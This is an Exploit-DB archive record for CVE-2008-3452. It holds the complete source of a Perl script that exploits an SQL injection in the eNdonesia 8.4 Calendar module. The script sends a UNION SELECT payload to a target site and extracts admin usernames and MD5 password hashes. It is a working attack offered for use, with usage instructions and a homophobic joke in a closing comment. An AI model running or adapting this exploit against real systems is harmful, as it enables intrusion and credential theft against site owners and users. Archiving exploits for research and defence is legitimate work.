eNdonesia 8.4 Calendar Module Remote SQL Injection Exploit

{"bulletinFamily": "exploit", "id": "EDB-ID:6171", "cvelist": ["CVE-2008-3452"], "modified": "2008-07-30T00:00:00", "lastseen": "2016-01-31T23:21:56", "edition": 1, "sourceData": "#!/usr/bin/perl\n#/-----------------------------------------------\\\n#| /-----------------------------------------\\ |\n#| | Remote SQL Exploit | |\n#| | eNdonesia 8.4 Remote SQL Exploit | |\n#| | www.endonesia.org | |\n#| | Calendar Module | |\n#| \\-----------------------------------------/ |\n#| /-----------------------------------------\\ |\n#| | Presented By Jack | |\n#| | MainHack Enterprise | |\n#| | www.MainHack.com & irc.nob0dy.net | | \n#| | #MainHack #nob0dy #BaliemHackerlink | |\n#| | Jack[at]MainHack[dot]com | |\n#| \\-----------------------------------------/ |\n#| /-----------------------------------------\\ |\n#| | Hello To: Indonesian h4x0r | |\n#| | yadoy666,n0c0py & okedeh | |\n#| | VOP Crew [Vaksin13,OoN_BoY,Paman] | |\n#| | NoGe,str0ke,H312Y,s3t4n,[S]hiro,frull | |\n#| | all MainHack BrotherHood | |\n#| \\-----------------------------------------/ |\n#\\-----------------------------------------------/\n \n use HTTP::Request;\n use LWP::UserAgent;\n\n $sql_vulnerable = \"/mod.php?mod=calendar&op=list_events&loc_id=\";\n $sql_injection = \"-999/**/union+select/**/0x3a,0x3a,concat(aid,0x3a,pwd),0x3a,concat(name,0x3a,pwd)/**/from/**/authors/*where%20name%20pwd\";\n\n if(!@ARGV) { &help;exit(1);}\n\n sub help(){\n print \"\\n [?] eNdonesia 8.4 Remote SQL Exploit\\n\";\n print \" [?] =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\\n\";\n print \" [?] Use : perl $0 www.target.com\\n\";\n print \" [?] Dont use \\\"http://\\\"\\n\"; \n print \" [?] =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\\n\";\n print \" [?] Baliem Hacker - VOP crew - MainHack BrotherHood \\n\\n\";\n print \" [?] www.MainHack.com\\n\\n\";\n }\n\n while (){\n my $target = $ARGV[0];\n my $exploit = \"http://\".$target.$sql_vulnerable.$sql_injection;\n print \"\\n [-] Trying to inject $target ...\\n\\n\";\n my $request = HTTP::Request->new(GET=>$exploit);\n my $useragent = LWP::UserAgent->new();\n $useragent->timeout(10);\n my $response = $useragent->request($request);\n if ($response->is_success){\n my $res = $response->content;\n if ($res =~ m/\\>([0-9,a-z]{2,13}):([0-9,a-f]{32})/g) {\n my ($username,$passwd) = ($1,$2);\n print \" [target] $target \\n\";\n print \" [loginx] $username:$passwd \\n\\n\";\n exit(0);\n }\n else {\n die \" [error] Fail to get username and password.\\n\\n\";\n }\n }\n else {\n die \" [error] Fail to inject $target \\n\\n\";\n }\n }\n\n#/----------------------------------------------------------------\\\n#| NoGay kalo kita artikan sepintas berarti Tidak ada Gay |\n#| namun mari kita perhatikan secara seksama ... |\n#| NoGay merupakan kependekan dari NoGe is Gay. |\n#| Sungguh, penyembunyian sebuah karakter di balik makna kata. |\n#\\----------------------------------------------------------------/\n#Vendor Has been contacted and now working for it.\n\n# milw0rm.com [2008-07-30]\n", "published": "2008-07-30T00:00:00", "href": "https://www.exploit-db.com/exploits/6171/", "osvdbidlist": ["47355"], "reporter": "Jack", "hash": "9abaed507dea3b11695f701acb654721886d7acc431e13601f2f764b47f9d54b", "title": "eNdonesia 8.4 Calendar Module Remote SQL Injection Exploit", "history": [], "type": "exploitdb", "objectVersion": "1.0", "description": "eNdonesia 8.4 (Calendar Module) Remote SQL Injection Exploit. CVE-2008-3452. Webapps exploit for php platform", "references": [], "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/6171/", "enchantments": {"vulnersScore": 3.5}}